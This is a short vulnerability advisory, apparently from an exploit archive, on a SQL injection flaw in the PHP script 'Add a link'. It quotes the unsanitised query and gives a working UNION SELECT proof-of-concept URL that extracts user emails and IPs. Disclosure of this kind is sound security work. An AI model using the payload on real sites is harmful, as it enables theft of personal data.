Add a link <= 4 - beta || Remote SQL Injection Vulnerability
/ Script: Add a link
/ Version: <= 4 - beta
/ File affected: user_read_links.php
/ Download: http://sourceforge.net/projects/addalink/
/ need magic_quotes_gpc = Off
Found by ka0x <ka0x01 [at] gmail [dot] com>
D.O.M Labs - Security Researchers
- www.domlabs.org
Vuln Code:
32: $read_out_linktable="SELECT * FROM $linktable WHERE approved='1' AND category_id='$category_id' ORDER BY id DESC LIMIT $start,$steps";
33: $read_result=mysql_query($read_out_linktable);
87: while($data=mysql_fetch_array($read_result))
88: {
90: echo "<tr><td colspan=\"5\">$data[description]</td></tr>";
91: }
The var $category_id isn't verified.
Proof of Concept:
http://[host]/[addalink-path]/user_read_links.php?category_id=' UNION SELECT 1,1,1,1,1,1,concat(email,0x3a,ip),1,1,1,1 FROM Linklisttable/*
# milw0rm.com [2008-09-18]